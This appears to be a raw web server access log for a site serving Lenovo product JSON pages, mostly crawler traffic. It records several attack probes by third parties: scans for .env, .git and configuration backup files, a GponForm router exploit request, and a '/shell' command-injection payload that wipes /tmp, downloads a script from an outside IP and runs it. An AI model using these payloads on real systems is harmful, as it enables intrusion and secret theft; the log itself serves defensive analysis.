172.70.223.159 - - [10/May/2026:03:39:35 +0800] "GET /sitemap.xml HTTP/1.1" 404 583 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
162.159.108.69 - - [10/May/2026:04:22:28 +0800] "GET /sitemap_index.xml HTTP/1.1" 404 583 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
172.70.49.196 - - [10/May/2026:04:31:14 +0800] "GET /index.php/lenovo/json/THINKBOOK-15P-G2-ITH/ HTTP/1.1" 200 2214 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; TikTokSpider; [email protected])"
162.159.108.82 - - [10/May/2026:04:34:12 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "-"
31.57.129.10 - - [10/May/2026:04:35:11 +0800] "POST /GponForm/diag_Form?images/ HTTP/1.1" 499 0 "-" "-"
162.159.110.55 - - [10/May/2026:04:43:21 +0800] "GET /sitemap.xml HTTP/1.1" 404 583 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
162.159.108.83 - - [10/May/2026:05:37:12 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
162.159.108.83 - - [10/May/2026:10:44:05 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.70.49.197 - - [10/May/2026:11:54:16 +0800] "GET /index.php/lenovo/json/YOGA-MOUSE-WITH-LASER-PRESENTER-4Y50U59628/ HTTP/1.1" 200 386 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
162.159.108.69 - - [10/May/2026:14:11:01 +0800] "GET /index.php/lenovo/json/THINKVISION-P34W-20/ HTTP/1.1" 200 741 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
162.159.108.82 - - [10/May/2026:18:09:07 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
172.70.222.118 - - [10/May/2026:21:16:32 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
162.159.108.82 - - [10/May/2026:21:25:03 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
172.70.222.118 - - [11/May/2026:00:46:37 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
162.159.108.83 - - [11/May/2026:02:02:19 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
162.159.108.82 - - [11/May/2026:04:42:02 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
172.70.49.200 - - [11/May/2026:04:42:06 +0800] "GET /index.php/lenovo/json/LEGION-5-15IMH05/ HTTP/1.1" 200 2232 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
172.70.223.160 - - [11/May/2026:06:54:08 +0800] "GET /index.php/lenovo/json/Q24I-1L-MONITOR/ HTTP/1.1" 200 575 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; TikTokSpider; [email protected])"
162.159.108.82 - - [11/May/2026:07:32:58 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
162.159.108.83 - - [11/May/2026:10:17:39 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
162.159.110.54 - - [11/May/2026:10:17:43 +0800] "GET /user_guide/libraries/xmlrpc.html HTTP/1.1" 200 15755 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
162.159.108.68 - - [11/May/2026:13:20:49 +0800] "GET /index.php/lenovo/json/THINKSTATION-P340-TINY/ HTTP/1.1" 200 3615 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; TikTokSpider; [email protected])"
172.70.49.201 - - [11/May/2026:16:29:00 +0800] "GET / HTTP/1.1" 200 12727 "-" "Cloudflare-SSLDetector"
172.70.223.159 - - [11/May/2026:18:42:24 +0800] "GET /actuator/env HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 26_3_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.7680.154 Safari/537.36"
162.159.110.55 - - [11/May/2026:18:57:17 +0800] "GET /index.php/lenovo/json/LENOVO-USB-C-TO-4-PORT-USB-A-HUB/ HTTP/1.1" 200 609 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
172.70.222.118 - - [11/May/2026:19:39:38 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.222.119 - - [11/May/2026:21:39:07 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
162.159.108.83 - - [11/May/2026:21:48:18 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
162.159.108.82 - - [11/May/2026:23:12:08 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
172.70.222.118 - - [11/May/2026:23:17:31 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.24.45 - - [12/May/2026:00:22:28 +0800] "GET /index.php/lenovo/json/YOGA-S730-13IML/ HTTP/1.1" 200 2031 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
162.159.108.83 - - [12/May/2026:08:03:33 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
172.64.213.21 - - [12/May/2026:15:28:12 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
172.70.49.200 - - [12/May/2026:15:28:31 +0800] "GET / HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
162.159.108.82 - - [12/May/2026:17:27:46 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
172.70.222.118 - - [12/May/2026:20:32:18 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.70.223.159 - - [12/May/2026:21:06:37 +0800] "GET /index.php/lenovo/json/LENOVO-540-USB-C-WIRED-COMPACT-MOUSE/ HTTP/1.1" 200 361 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
172.64.213.8 - - [12/May/2026:21:40:21 +0800] "GET /index.php/lenovo/json/THINKPAD-PEN-PRO-FOR-X1-YOGA/ HTTP/1.1" 200 361 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
162.159.108.82 - - [13/May/2026:01:34:36 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
172.70.223.121 - - [13/May/2026:03:45:00 +0800] "HEAD / HTTP/1.1" 499 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 (compatible; +https://developers.cloudflare.com/security-center/)"
162.159.108.134 - - [13/May/2026:08:01:46 +0800] "GET /.git/logs/HEAD HTTP/1.1" 404 146 "-" "Mozilla/5.0"
162.159.108.135 - - [13/May/2026:08:01:46 +0800] "GET /.gitignore HTTP/1.1" 404 146 "-" "Mozilla/5.0"
172.64.215.30 - - [13/May/2026:08:01:46 +0800] "GET /.git/COMMIT_EDITMSG HTTP/1.1" 404 146 "-" "Mozilla/5.0"
172.70.49.168 - - [13/May/2026:08:01:46 +0800] "GET /.git/refs/heads/master HTTP/1.1" 404 146 "-" "Mozilla/5.0"
162.159.110.30 - - [13/May/2026:08:01:46 +0800] "GET /..%252f..%252f.ENV HTTP/1.1" 403 736 "-" "Mozilla/5.0"
172.64.213.122 - - [13/May/2026:08:01:46 +0800] "GET /.env.old HTTP/1.1" 403 736 "-" "Mozilla/5.0"
172.64.215.30 - - [13/May/2026:08:01:47 +0800] "GET /.git/HEAD HTTP/1.1" 404 146 "-" "Mozilla/5.0"
172.71.8.51 - - [13/May/2026:08:01:47 +0800] "GET /configuration.php HTTP/1.1" 404 146 "-" "Mozilla/5.0"
172.64.213.122 - - [13/May/2026:08:01:47 +0800] "GET /.env.development HTTP/1.1" 404 583 "-" "Mozilla/5.0"
162.159.110.30 - - [13/May/2026:08:01:47 +0800] "GET /.env.local HTTP/1.1" 404 583 "-" "Mozilla/5.0"
172.70.222.175 - - [13/May/2026:08:01:47 +0800] "GET /.git/refs/heads/main HTTP/1.1" 404 146 "-" "Mozilla/5.0"
172.71.24.112 - - [13/May/2026:08:01:47 +0800] "GET /.git/index HTTP/1.1" 404 146 "-" "Mozilla/5.0"
172.64.213.123 - - [13/May/2026:08:01:47 +0800] "GET /.git/config HTTP/1.1" 404 146 "-" "Mozilla/5.0"
172.70.222.174 - - [13/May/2026:08:01:47 +0800] "GET /.env.bak HTTP/1.1" 403 736 "-" "Mozilla/5.0"
172.70.122.225 - - [13/May/2026:08:01:47 +0800] "GET /sites/default/settings.php HTTP/1.1" 404 146 "-" "Mozilla/5.0"
172.64.215.30 - - [13/May/2026:08:01:47 +0800] "GET /.gitattributes HTTP/1.1" 404 146 "-" "Mozilla/5.0"
162.159.110.30 - - [13/May/2026:08:01:47 +0800] "GET /app/.env HTTP/1.1" 404 583 "-" "Mozilla/5.0"
172.64.215.30 - - [13/May/2026:08:01:47 +0800] "GET /configuration.php.bak HTTP/1.1" 403 736 "-" "Mozilla/5.0"
172.70.49.169 - - [13/May/2026:08:01:47 +0800] "GET /telescope HTTP/1.1" 404 583 "-" "Mozilla/5.0"
172.71.24.113 - - [13/May/2026:08:01:47 +0800] "GET /.env.production HTTP/1.1" 404 583 "-" "Mozilla/5.0"
172.70.122.224 - - [13/May/2026:08:01:47 +0800] "GET /api/.env HTTP/1.1" 404 583 "-" "Mozilla/5.0"
172.70.122.225 - - [13/May/2026:08:01:47 +0800] "GET /.env HTTP/1.1" 404 583 "-" "Mozilla/5.0"
172.71.8.50 - - [13/May/2026:08:01:47 +0800] "GET /local/.env HTTP/1.1" 404 583 "-" "Mozilla/5.0"
172.71.8.51 - - [13/May/2026:08:01:47 +0800] "GET /.env%23 HTTP/1.1" 404 583 "-" "Mozilla/5.0"
172.64.213.122 - - [13/May/2026:08:01:47 +0800] "GET /.env.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0"
172.70.122.224 - - [13/May/2026:08:01:47 +0800] "GET /.env.save HTTP/1.1" 404 583 "-" "Mozilla/5.0"
172.64.215.30 - - [13/May/2026:08:01:47 +0800] "GET /%2e%65%6e%76 HTTP/1.1" 404 583 "-" "Mozilla/5.0"
172.68.119.78 - - [13/May/2026:08:01:47 +0800] "GET /.env.backup HTTP/1.1" 404 583 "-" "Mozilla/5.0"
172.71.8.51 - - [13/May/2026:08:01:47 +0800] "GET /.env HTTP/1.1" 404 583 "-" "Mozilla/5.0"
172.68.119.77 - - [13/May/2026:08:01:47 +0800] "GET /package.json HTTP/1.1" 404 583 "-" "Mozilla/5.0"
172.68.119.78 - - [13/May/2026:08:01:47 +0800] "GET /.ENV HTTP/1.1" 404 583 "-" "Mozilla/5.0"
172.70.122.225 - - [13/May/2026:08:01:47 +0800] "GET /config/.env HTTP/1.1" 404 583 "-" "Mozilla/5.0"
162.159.110.31 - - [13/May/2026:08:01:47 +0800] "GET /telescope/requests HTTP/1.1" 404 583 "-" "Mozilla/5.0"
172.64.213.122 - - [13/May/2026:08:01:47 +0800] "GET /.env.production.local HTTP/1.1" 404 583 "-" "Mozilla/5.0"
172.71.24.210 - - [13/May/2026:08:01:47 +0800] "GET /storage/.env HTTP/1.1" 404 583 "-" "Mozilla/5.0"
172.71.24.113 - - [13/May/2026:08:01:47 +0800] "GET /storage/logs/laravel.log HTTP/1.1" 404 583 "-" "Mozilla/5.0"
172.71.24.112 - - [13/May/2026:08:01:47 +0800] "GET /backend/.env HTTP/1.1" 404 583 "-" "Mozilla/5.0"
172.70.222.175 - - [13/May/2026:08:01:47 +0800] "GET /.env.example HTTP/1.1" 404 583 "-" "Mozilla/5.0"
172.70.122.225 - - [13/May/2026:08:01:47 +0800] "GET /horizon/dashboard HTTP/1.1" 404 583 "-" "Mozilla/5.0"
172.64.215.30 - - [13/May/2026:08:01:47 +0800] "GET /.env~ HTTP/1.1" 404 583 "-" "Mozilla/5.0"
162.159.110.10 - - [13/May/2026:08:01:47 +0800] "GET /_debugbar/open HTTP/1.1" 404 583 "-" "Mozilla/5.0"
162.158.118.242 - - [13/May/2026:08:01:47 +0800] "GET /_debugbar HTTP/1.1" 404 583 "-" "Mozilla/5.0"
162.159.108.83 - - [13/May/2026:11:32:07 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
162.159.108.83 - - [13/May/2026:13:09:58 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
162.159.108.83 - - [13/May/2026:14:53:22 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
172.71.8.86 - - [13/May/2026:14:53:32 +0800] "GET /index.php/lenovo/json/LENOVO-SMARTCARD-WIRED-KEYBOARD-II/ HTTP/1.1" 200 357 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
162.159.108.82 - - [13/May/2026:15:23:03 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.159.108.82 - - [13/May/2026:21:41:23 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
172.70.222.118 - - [13/May/2026:22:22:58 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
172.71.24.207 - - [14/May/2026:03:55:29 +0800] "GET /index.php/lenovo/json/LENOVO-500-FHD-WEBCAM/ HTTP/1.1" 200 635 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
162.159.108.82 - - [14/May/2026:08:45:47 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
162.159.108.83 - - [14/May/2026:10:41:16 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
162.159.108.83 - - [14/May/2026:10:57:21 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
172.68.119.8 - - [14/May/2026:17:37:07 +0800] "GET /index.php/lenovo/json/THINKVISION-T27H-2L-FLAT-PANEL-MONITOR/ HTTP/1.1" 200 617 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
172.70.223.159 - - [14/May/2026:19:06:03 +0800] "GET /index.php/lenovo/json/FLEX-14IML/ HTTP/1.1" 200 2169 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
172.70.222.119 - - [15/May/2026:00:23:48 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
162.159.108.83 - - [15/May/2026:04:07:40 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
162.159.108.82 - - [15/May/2026:07:16:58 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
162.159.108.83 - - [15/May/2026:14:08:53 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
162.159.108.82 - - [15/May/2026:17:53:06 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
172.71.8.87 - - [15/May/2026:17:53:18 +0800] "GET /index.php/lenovo/json/LENOVO-L27I-30-MONITOR/ HTTP/1.1" 200 577 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
162.159.108.82 - - [16/May/2026:00:04:47 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
162.159.108.82 - - [16/May/2026:04:52:51 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
172.70.222.97 - - [16/May/2026:09:49:32 +0800] "GET / HTTP/1.1" 499 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
172.70.222.97 - - [16/May/2026:09:50:15 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:142.0) Gecko/20100101 Firefox/142.0"
162.159.108.83 - - [16/May/2026:10:30:32 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
162.159.108.83 - - [16/May/2026:14:03:06 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
172.70.49.200 - - [16/May/2026:14:03:34 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)"
162.159.108.83 - - [16/May/2026:21:04:41 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
162.159.108.83 - - [17/May/2026:00:10:37 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
162.159.108.83 - - [17/May/2026:02:12:00 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
172.68.119.7 - - [17/May/2026:02:12:09 +0800] "GET /index.php/lenovo/json/LENOVO-L29W-30/ HTTP/1.1" 200 573 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
172.70.223.5 - - [17/May/2026:04:23:14 +0800] "GET /index.php/lenovo/json/LENOVO-510-FHD-WEBCAM/ HTTP/1.1" 200 345 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
162.159.108.82 - - [17/May/2026:11:50:42 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
172.68.119.8 - - [17/May/2026:16:05:31 +0800] "GET /index.php/lenovo/json/FLEX-3-CHROMEBOOK-11IJL6/ HTTP/1.1" 200 635 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
162.159.108.82 - - [17/May/2026:17:07:27 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.0; +https://openai.com/searchbot"
162.159.108.83 - - [17/May/2026:21:31:39 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; https://zhanzhang.toutiao.com/)"
162.158.119.175 - - [17/May/2026:22:00:02 +0800] "GET /lenovo/json/V310-15IKB HTTP/1.1" 200 3052 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
172.70.222.118 - - [18/May/2026:00:24:27 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
210.191.89.156 - - [18/May/2026:00:42:05 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+167.71.210.63/jaws;sh+/tmp/jaws HTTP/1.1" 499 0 "-" "Hello, world"
172.70.222.118 - - [18/May/2026:00:45:37 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
162.159.108.82 - - [18/May/2026:01:36:11 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
172.64.213.21 - - [18/May/2026:02:56:39 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
162.159.110.55 - - [18/May/2026:02:57:08 +0800] "GET / HTTP/1.1" 200 12727 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
162.159.110.55 - - [18/May/2026:02:57:26 +0800] "GET /test_404_page/ HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36"
172.64.215.116 - - [18/May/2026:02:58:50 +0800] "GET //favicon.ico HTTP/1.1" 404 583 "-" "python-requests/2.23.0"
162.159.108.68 - - [18/May/2026:06:00:58 +0800] "GET /adminer.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
172.71.8.86 - - [18/May/2026:06:00:59 +0800] "GET /adminer/adminer.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
172.64.215.68 - - [18/May/2026:06:00:59 +0800] "GET /_adminer.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36"
172.64.213.8 - - [18/May/2026:06:01:00 +0800] "GET /admin/adminer.php HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0"
162.159.108.83 - - [18/May/2026:09:40:01 +0800] "GET /robots.txt HTTP/1.1" 404 583 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
